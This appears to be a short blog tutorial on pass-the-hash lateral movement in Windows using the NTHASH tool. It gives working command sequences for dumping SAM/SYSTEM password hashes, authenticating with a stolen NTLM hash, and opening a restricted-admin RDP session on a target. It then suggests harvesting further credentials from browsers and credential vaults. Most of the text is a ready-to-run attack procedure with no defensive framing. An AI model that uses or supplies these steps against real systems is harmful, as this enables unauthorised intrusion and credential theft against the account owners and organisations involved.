Following previous article on NTHASH, lets see how to perform lateral movement using « pass the hash » (pth).
In 3 steps, lets retrieve some hashes and then lets perform a PTH (using MS RDP client).
1.Retrieve the hash
NTHASH-win64.exe /dumphashes /system
reg save hklm\sam sam.sav and reg save hklm\system system.sav
NTHASH-win64.exe /dumphashes /offline
or (in a domain env)
2.Pass the hash
NTHASH-win64.exe /pth /user:username /password:8846F7EAEE8FB117AD06BDD830B7586C /domain:.
3.In the newly opened cmd « pth » shell, type mstsc /restrictedadmin /v:target
You will end up logged as the « username » account in a RDP console on server named « target ».
Try a simple whoami for fun and go back to credential harvesting for this account using /firefox, /chrome, /enumvault, /enumcred, etc.
And you never had to enter the « username » password…
Note that any other client tool (preferably built in windows) that inherit ntlm credentials from current logon session will work too (tasklist/taskkill, wmic, net, winrm/powershell, psexec, etc)
This will be covered in future articles.